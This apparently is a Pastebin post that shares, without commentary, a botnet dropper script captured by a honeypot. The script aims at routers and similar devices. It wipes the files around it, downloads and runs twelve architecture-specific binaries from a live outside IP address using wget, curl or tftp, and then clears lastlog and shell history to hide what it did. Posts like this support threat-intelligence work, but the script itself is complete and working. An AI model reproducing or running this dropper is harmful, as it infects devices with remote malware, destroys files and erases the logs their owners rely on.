Advertisement
recon-scout

Honeypot Payload! Seen on: 2016-05-31 09:33

May 31st, 2016
372
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 3.31 KB | None | 0 0
  1. #!/bin/sh
  2.  
  3. # Delete any current files, because not all routers have much storage space
  4. rm -f * || busybox rm -f *
  5.  
  6. # Wget/cURL our binaries
  7. wget -q http://185.22.172.238/1 || curl -s -O http://185.22.172.238/1 || busybox wget -q http://185.22.172.238/1 || busybox curl -s -O http://185.22.172.238/1 || busybox tftp -r 1 -g 185.22.172.238 || busybox tftp 185.22.172.238 -c get 1
  8. wget -q http://185.22.172.238/2 || curl -s -O http://185.22.172.238/2 || busybox wget -q http://185.22.172.238/2 || busybox curl -s -O http://185.22.172.238/2 || busybox tftp -r 2 -g 185.22.172.238 || busybox tftp 185.22.172.238 -c get 2
  9. wget -q http://185.22.172.238/3 || curl -s -O http://185.22.172.238/3 || busybox wget -q http://185.22.172.238/3 || busybox curl -s -O http://185.22.172.238/3 || busybox tftp -r 3 -g 185.22.172.238 || busybox tftp 185.22.172.238 -c get 3
  10. wget -q http://185.22.172.238/4 || curl -s -O http://185.22.172.238/4 || busybox wget -q http://185.22.172.238/4 || busybox curl -s -O http://185.22.172.238/4 || busybox tftp -r 4 -g 185.22.172.238 || busybox tftp 185.22.172.238 -c get 4
  11. wget -q http://185.22.172.238/5 || curl -s -O http://185.22.172.238/5 || busybox wget -q http://185.22.172.238/5 || busybox curl -s -O http://185.22.172.238/5 || busybox tftp -r 5 -g 185.22.172.238 || busybox tftp 185.22.172.238 -c get 5
  12. wget -q http://185.22.172.238/6 || curl -s -O http://185.22.172.238/6 || busybox wget -q http://185.22.172.238/6 || busybox curl -s -O http://185.22.172.238/6 || busybox tftp -r 6 -g 185.22.172.238 || busybox tftp 185.22.172.238 -c get 6
  13. wget -q http://185.22.172.238/7 || curl -s -O http://185.22.172.238/7 || busybox wget -q http://185.22.172.238/7 || busybox curl -s -O http://185.22.172.238/7 || busybox tftp -r 7 -g 185.22.172.238 || busybox tftp 185.22.172.238 -c get 7
  14. wget -q http://185.22.172.238/8 || curl -s -O http://185.22.172.238/8 || busybox wget -q http://185.22.172.238/8 || busybox curl -s -O http://185.22.172.238/8 || busybox tftp -r 8 -g 185.22.172.238 || busybox tftp 185.22.172.238 -c get 8
  15. wget -q http://185.22.172.238/9 || curl -s -O http://185.22.172.238/9 || busybox wget -q http://185.22.172.238/9 || busybox curl -s -O http://185.22.172.238/9 || busybox tftp -r 9 -g 185.22.172.238 || busybox tftp 185.22.172.238 -c get 9
  16. wget -q http://185.22.172.238/10 || curl -s -O http://185.22.172.238/10 || busybox wget -q http://185.22.172.238/10 || busybox curl -s -O http://185.22.172.238/10 || busybox tftp -r 10 -g 185.22.172.238 || busybox tftp 185.22.172.238 -c get 10
  17. wget -q http://185.22.172.238/11 || curl -s -O http://185.22.172.238/11 || busybox wget -q http://185.22.172.238/11 || busybox curl -s -O http://185.22.172.238/11 || busybox tftp -r 11 -g 185.22.172.238 || busybox tftp 185.22.172.238 -c get 11
  18. wget -q http://185.22.172.238/12 || curl -s -O http://185.22.172.238/12 || busybox wget -q http://185.22.172.238/12 || busybox curl -s -O http://185.22.172.238/12 || busybox tftp -r 11 -g 185.22.172.238 || busybox tftp 185.22.172.238 -c get 12
  19.  
  20. # Set file permissions
  21. chmod 777 * || busybox chmod 777 *
  22.  
  23. # Run correct binary for current architecture
  24. ./1 || ./2 || ./3 || ./4 || ./5 || ./6 || ./7 || ./8 || ./9 || ./10 || ./11 || ./12
  25.  
  26. # Delete our files
  27. rm -f * || busybox rm -f *
  28.  
  29. # Clear up
  30. >/var/log/lastlog
  31. >/etc/lastlog
  32. rm -f ~/.bash_history || busybox rm -f ~/.bash_history
  33. history -c
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement